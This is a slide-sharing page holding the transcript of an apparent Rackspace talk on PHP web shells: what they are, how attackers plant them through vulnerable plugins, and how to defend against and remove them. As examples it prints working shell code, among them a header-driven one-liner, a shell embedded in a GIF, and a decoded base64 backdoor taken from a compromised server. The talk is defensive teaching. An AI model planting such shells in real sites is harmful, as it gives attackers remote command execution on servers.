Loose Lips Sink Ships: Why Your Application Tells Me How to Hack It
 
Create dynamic sites with PHP & MySQL
Create dynamic sites with PHP & MySQLCreate dynamic sites with PHP & MySQL
Create dynamic sites with PHP & MySQL
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
 
Docker for Developers - PNWPHP 2016 Workshop
Docker for Developers - PNWPHP 2016 WorkshopDocker for Developers - PNWPHP 2016 Workshop
Docker for Developers - PNWPHP 2016 Workshop
 
Developing and Deploying PHP with Docker
Developing and Deploying PHP with DockerDeveloping and Deploying PHP with Docker
Developing and Deploying PHP with Docker
 
Apache
ApacheApache
Apache
 
Securing Your Web Server
Securing Your Web ServerSecuring Your Web Server
Securing Your Web Server
 
DevOps in PHP environment
DevOps in PHP environment DevOps in PHP environment
DevOps in PHP environment
 
How to Secure Your WordPress Site
How to Secure Your WordPress SiteHow to Secure Your WordPress Site
How to Secure Your WordPress Site
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Laravel Forge: Hello World to Hello Production
Laravel Forge: Hello World to Hello ProductionLaravel Forge: Hello World to Hello Production
Laravel Forge: Hello World to Hello Production
 
PHP Dependency Management with Composer
PHP Dependency Management with ComposerPHP Dependency Management with Composer
PHP Dependency Management with Composer
 
Lecture11_LaravelGetStarted_SPring2023.pdf
Lecture11_LaravelGetStarted_SPring2023.pdfLecture11_LaravelGetStarted_SPring2023.pdf
Lecture11_LaravelGetStarted_SPring2023.pdf
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best Practices
 
Bz backtrack.usage
Bz backtrack.usageBz backtrack.usage
Bz backtrack.usage
 

Recently uploaded

The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
OECD Directorate for Financial and Enterprise Affairs
 
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussionArtificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
OECD Directorate for Financial and Enterprise Affairs
 
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
OECD Directorate for Financial and Enterprise Affairs
 
Pro-competitive Industrial Policy – OECD – June 2024 OECD discussion
Pro-competitive Industrial Policy – OECD – June 2024 OECD discussionPro-competitive Industrial Policy – OECD – June 2024 OECD discussion
Pro-competitive Industrial Policy – OECD – June 2024 OECD discussion
OECD Directorate for Financial and Enterprise Affairs
 
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
Suzanne Lagerweij
 
XP 2024 presentation: A New Look to Leadership
XP 2024 presentation: A New Look to LeadershipXP 2024 presentation: A New Look to Leadership
XP 2024 presentation: A New Look to Leadership
samililja
 
Competition and Regulation in Professions and Occupations – ROBSON – June 202...
Competition and Regulation in Professions and Occupations – ROBSON – June 202...Competition and Regulation in Professions and Occupations – ROBSON – June 202...
Competition and Regulation in Professions and Occupations – ROBSON – June 202...
OECD Directorate for Financial and Enterprise Affairs
 
ASONAM2023_presection_slide_track-recommendation.pdf
ASONAM2023_presection_slide_track-recommendation.pdfASONAM2023_presection_slide_track-recommendation.pdf
ASONAM2023_presection_slide_track-recommendation.pdf
ToshihiroIto4
 
Carrer goals.pptx and their importance in real life
Carrer goals.pptx and their importance in real lifeCarrer goals.pptx and their importance in real life
Carrer goals.pptx and their importance in real life
artemacademy2
 
The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...
The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...
The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...
OECD Directorate for Financial and Enterprise Affairs
 
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
kekzed
 
Using-Presentation-Software-to-the-Fullf.pptx
Using-Presentation-Software-to-the-Fullf.pptxUsing-Presentation-Software-to-the-Fullf.pptx
Using-Presentation-Software-to-the-Fullf.pptx
kainatfatyma9
 
The remarkable life of Sir Mokshagundam Visvesvaraya.pptx
The remarkable life of Sir Mokshagundam Visvesvaraya.pptxThe remarkable life of Sir Mokshagundam Visvesvaraya.pptx
The remarkable life of Sir Mokshagundam Visvesvaraya.pptx
JiteshKumarChoudhary2
 
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussion
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussionPro-competitive Industrial Policy – LANE – June 2024 OECD discussion
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussion
OECD Directorate for Financial and Enterprise Affairs
 
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
OECD Directorate for Financial and Enterprise Affairs
 
Disaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other usesDisaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other uses
RIDHIMAGARG21
 
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
gpww3sf4
 
IEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdfIEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdf
Claudio Gallicchio
 
Why Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdf
Why Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdfWhy Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdf
Why Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdf
Ben Linders
 
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdfBRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
Robin Haunschild
 

Recently uploaded (20)

The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
 
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussionArtificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
 
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
 
Pro-competitive Industrial Policy – OECD – June 2024 OECD discussion
Pro-competitive Industrial Policy – OECD – June 2024 OECD discussionPro-competitive Industrial Policy – OECD – June 2024 OECD discussion
Pro-competitive Industrial Policy – OECD – June 2024 OECD discussion
 
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
 
XP 2024 presentation: A New Look to Leadership
XP 2024 presentation: A New Look to LeadershipXP 2024 presentation: A New Look to Leadership
XP 2024 presentation: A New Look to Leadership
 
Competition and Regulation in Professions and Occupations – ROBSON – June 202...
Competition and Regulation in Professions and Occupations – ROBSON – June 202...Competition and Regulation in Professions and Occupations – ROBSON – June 202...
Competition and Regulation in Professions and Occupations – ROBSON – June 202...
 
ASONAM2023_presection_slide_track-recommendation.pdf
ASONAM2023_presection_slide_track-recommendation.pdfASONAM2023_presection_slide_track-recommendation.pdf
ASONAM2023_presection_slide_track-recommendation.pdf
 
Carrer goals.pptx and their importance in real life
Carrer goals.pptx and their importance in real lifeCarrer goals.pptx and their importance in real life
Carrer goals.pptx and their importance in real life
 
The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...
The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...
The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...
 
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
 
Using-Presentation-Software-to-the-Fullf.pptx
Using-Presentation-Software-to-the-Fullf.pptxUsing-Presentation-Software-to-the-Fullf.pptx
Using-Presentation-Software-to-the-Fullf.pptx
 
The remarkable life of Sir Mokshagundam Visvesvaraya.pptx
The remarkable life of Sir Mokshagundam Visvesvaraya.pptxThe remarkable life of Sir Mokshagundam Visvesvaraya.pptx
The remarkable life of Sir Mokshagundam Visvesvaraya.pptx
 
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussion
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussionPro-competitive Industrial Policy – LANE – June 2024 OECD discussion
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussion
 
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
 
Disaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other usesDisaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other uses
 
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
 
IEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdfIEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdf
 
Why Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdf
Why Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdfWhy Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdf
Why Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdf
 
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdfBRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
 

An introduction to php shells

  • 1. An introduction to PHP shells Richard Mahoney, Developer Support Engineer Created by: Richard Mahoney Modified Date:09/05/2013 Classification: Public
  • 2. RACKSPACE® HOSTING | WWW.RACKSPACE.COM About Me •PHP developer before becoming a Linux SysAdmin 6 years ago •Joined Rackspace in 2013 •Several years of experience with web app security •Is a Certified Ethical Hacker 2
  • 3. RACKSPACE® HOSTING | WWW.RACKSPACE.COM About this presentation •What PHP shells are and why they exist •Where they come from •How to defend against the threat •Removal •Q & A 3
  • 4. RACKSPACE® HOSTING | WWW.RACKSPACE.COM 4 So, what is a PHP shell?
  • 5. RACKSPACE® HOSTING | WWW.RACKSPACE.COM What is a PHP shell? •A malicious file containing PHP functions such as eval() and shell_exec() •Accepts input via $_GET, $_POST, HTTP headers and even $_COOKIE •Usually obfuscated: eval(base64_decode('JF9HRVRbY10=')); •Used to run arbitrary commands supplied by the attacker •The most common variant is the C99 shell 5
  • 6. RACKSPACE® HOSTING | WWW.RACKSPACE.COM How much of a threat? •Worst case: root compromise via a kernel exploit or simply by looking through files for passwords •But that's not really needed... •As the Apache user it can: •Be used to download, install and execute additional software to join IRC botnets or for Bitcoin mining •Steal data by using MySQL credentials found in PHP files •Host illegal material •Send out huge amounts of spam (very common) •Be used as a proxy for launching attacks on other servers, including those behind the same firewall 6
  • 7. RACKSPACE® HOSTING | WWW.RACKSPACE.COM Here’s what one looks like 7
  • 8. RACKSPACE® HOSTING | WWW.RACKSPACE.COM 8 How did it get onto my server?
  • 9. RACKSPACE® HOSTING | WWW.RACKSPACE.COM Where did it come from? •The vast majority are via vulnerable third-party plugins for Wordpress, Joomla etc •Automated bots scan for the presence of these plugins and notify the attacker •The attacker then uploads the malicious code, typically to an /uploads or /media directory by exploiting the vulnerable website •The attacker visits the malicious shell script via a browser or by using a tool such as cURL •All of these steps could be scripted to continually compromise hosts and build a botnet •But, don't forget (S)FTP or your own code as an attack vector 9
  • 10. RACKSPACE® HOSTING | WWW.RACKSPACE.COM 10 Defending against the threat
  • 11. RACKSPACE® HOSTING | WWW.RACKSPACE.COM The golden rule •Never trust user input •Validate and sanitise as appropriate •The contents of $_GET, $_POST, $_FILES, $_COOKIE, $_SERVER, $_ENV, and HTTP headers should be considered unsafe •Use PHP functions such as filter_var() •Strip null bytes from filenames by using trim() •Check the contents of any file uploaded to the server. Do not rely on file extensions •Or even the first few bytes of it – malicious code can be embedded inside image files like this GIF: GIF89a^A???^A??????????????????!??^D^A????????????,????????????^A???^A??????^B^B D^A???;??? <?php @error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc']; if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIb ... 11
  • 12. RACKSPACE® HOSTING | WWW.RACKSPACE.COM Another example •Grepping your codebase for strings like 'eval(' will result in a lot of hits in a standard Wordpress install due to it's use in Javascript libraries: root@www:/var/applications/example.com/public# grep 'eval(' * -R | wc -l 33 •But it's easy for an attacker to evade scans. This is a fully working PHP shell: <?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?> Where the HTTP header A is set to the string “eval”, and B can be any PHP function. 12
  • 13. RACKSPACE® HOSTING | WWW.RACKSPACE.COM What else can I do? •Create a .htaccess file in any directories which shouldn't contain PHP code •In the contents: php_flag engine off •Ensure SFTP/FTP passwords are strong •Apache log files should be owned by root to prevent LFI (local file inclusion) attacks •Never run Apache as root •Install anti virus software and set it to scan on write 13
  • 14. RACKSPACE® HOSTING | WWW.RACKSPACE.COM 14 Removal
  • 15. RACKSPACE® HOSTING | WWW.RACKSPACE.COM Example of a compromised server This /images directory contains 3 PHP shells: [root@web1 images]# ls -l *.php -rw-r--r-- 1 apache apache 123617 Jun 19 16:09 404.php -rw-r--r-- 1 apache apache 11684 Jun 19 17:34 mlr2.php -rw-r--r-- 1 apache apache 24364 Jun 30 17:43 wso.php The contents: <?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BP U1RbJ2UnXSkpO2VjaG8gJzM3MzcyYjM3MzIyZTMyMzMzMDJlMzEzNTM4M2E3Njc4MzI2MzZiNzI2NTNl NzIzMzY1NjA2MzY4Jzs=')); ?> 15
  • 16. RACKSPACE® HOSTING | WWW.RACKSPACE.COM Example of a compromised server Which evaluates to: if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo '37372b37322e3233302e3135383a767832636b72653e723365606368'; To make these safe, move them to somewhere like “/root/compromised_files” if you want to investigate further, or just delete them. If you can't/don't want to move the files, chmod to 000 and set the owner to root to disable access: [root@web1 images]# ls -l *.php ---------- 1 root root 123617 Jun 19 16:09 404.php ---------- 1 root root 11684 Jun 19 17:34 mlr2.php ---------- 1 root root 24364 Jun 30 17:43 wso.php 16
  • 17. RACKSPACE® HOSTING | WWW.RACKSPACE.COM Next steps •Check for unusual files in places such as /tmp and /var/cache •Use “ls -la” to show hidden directories •Study the output of “lsof” •If malicious files owned by root are found, wipe the server and reinstall •Update all software on the server, including any CMS addons/plugins •Perform a virus scan 17
  • 18. RACKSPACE® HOSTING | WWW.RACKSPACE.COM 18 Any Questions?
  • 19. RACKSPACE® HOSTING | WWW.RACKSPACE.COM Further reading The Open Web Application Security Project – (OWASP) Top 10: owasp.org The PHP Security Guide: phpsec.org /r/Netsec: reddit.com/r/netsec 19
  • 20. RACKSPACE® HOSTING | 5000 WALZEM ROAD | SAN ANTONIO, TX 78218 US SALES: 1-800-961-2888 | US SUPPORT: 1-800-961-4454 | WWW.RACKSPACE.COM RACKSPACE® HOSTING | © RACKSPACE US, INC. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COMRACKSPACE® HOSTING | © RACKSPACE US, INC. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COM RACKSPACE® HOSTING | 5 MILLINGTON ROAD | HAYES, UNITED KINGDOM UB3 4AZ UK SALES: +44 (0)20 8712 6507 | UK SUPPORT: 0800 988 0300 | WWW.RACKSPACE.CO.UK

Editor's Notes

  1. ----- Meeting Notes (13/05/2014 15:02) ----- Filesystem permissions Consider using safe mode or disable functions such as allow_url_fopen() (new slide) + Suhosin, php-fpm, mod_suexec
  2. ----- Meeting Notes (13/05/2014 15:02) ----- Check Apache access/error logs Make sure the holes are closed